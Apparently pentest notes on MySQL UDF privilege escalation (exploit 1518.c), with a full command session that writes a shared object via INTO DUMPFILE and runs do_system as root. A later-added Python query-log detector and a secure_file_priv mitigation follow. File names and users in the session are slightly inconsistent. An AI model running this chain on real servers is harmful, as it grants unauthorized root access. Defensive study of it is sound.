MYSQL 3306

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library 1518.c (local db ser)

$ id
uid=500(raptor) gid=500(raptor) groups=500(raptor)
$ gcc -g -c 1518.c
$ gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
$ mysql -u root -p
Enter password:
[...]
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/j0hn/1518.so'));
mysql> select * from foo into dumpfile '/usr/lib/1518.so';
mysql> create function do_system returns integer soname '1518.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
mysql> select do_system('id > /tmp/out; chown j0hn.j0hn /tmp/out');
mysql> \! sh
sh-2.05b$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
[...]

remote db ser example = hex approach instead of load_file

not necessarily a root user; may still need to get a .elf rev shell first
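
Detection side of the session above and of the hex variant, as an added example that is not part of the original notes or of the 1518.c exploit: it scans MySQL general query log lines for the statements that write a shared object to disk and register a UDF from it. The log line layout, the sample lines, and the names scan and sessions_with_full_chain are assumptions made for this example.

```python
import re

# Assumed general-query-log layout: <timestamp> <connection id> Query <statement>
LINE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
WRITE, REGISTER = "library written with INTO DUMPFILE", "UDF registered with SONAME"
RULES = [
    (WRITE, re.compile(r"into\s+dumpfile\s+'[^']*\.so(?:\.\d+)*'", re.I)),
    (REGISTER, re.compile(
        r"create\s+(?:aggregate\s+)?function\s+\w+\s+returns\s+\w+\s+soname\s+'[^']+'", re.I)),
    ("load_file() reading a shared object",
     re.compile(r"load_file\(\s*'[^']*\.so[^']*'\s*\)", re.I)),
    ("hex literal starting with ELF magic", re.compile(r"\b0x7f454c46[0-9a-f]*", re.I)),
]

# Constructed sample log; the statements of connection 15 are taken from the session above.
SAMPLE_LOG = """\
2024-05-01T10:00:01.000000Z\t   12 Query\tselect * from orders into outfile '/tmp/orders.csv'
2024-05-01T10:02:10.000000Z\t   15 Query\tinsert into foo values(load_file('/home/j0hn/1518.so'))
2024-05-01T10:02:15.000000Z\t   15 Query\tselect * from foo into dumpfile '/usr/lib/1518.so'
2024-05-01T10:02:20.000000Z\t   15 Query\tcreate function do_system returns integer soname '1518.so'
2024-05-01T10:05:00.000000Z\t   19 Query\tselect 0x7f454c4602 into dumpfile '/usr/lib/x.so'
2024-05-01T10:06:00.000000Z\t   21 Query\tcreate function lower_ascii returns string soname 'approved_udf.so'
""".splitlines()

def scan(lines):
    """Return (timestamp, connection id, rule name, statement) for every rule hit."""
    hits = []
    for line in lines:
        m = LINE.match(line.rstrip("\n"))
        if not m:
            continue  # not a Query line in the assumed layout
        ts, conn, stmt = m.groups()
        hits += [(ts, int(conn), name, stmt) for name, rx in RULES if rx.search(stmt)]
    return hits

def sessions_with_full_chain(hits):
    """Connection ids that both wrote a library file and registered a UDF."""
    seen = {}
    for _, conn, name, _ in hits:
        seen.setdefault(conn, set()).add(name)
    return sorted(c for c, names in seen.items() if {WRITE, REGISTER} <= names)

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for ts, conn, rule, stmt in hits:
        print(f"{ts} conn={conn} {rule}: {stmt}")
    print("write + register in one connection:", sessions_with_full_chain(hits))
```

Every CREATE FUNCTION ... SONAME is reported, including legitimate ones, so hits are reviewed against the expected contents of mysql.func. Setting secure_file_priv restricts where load_file() and INTO DUMPFILE can read and write.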

generate hex

Credentials

enum
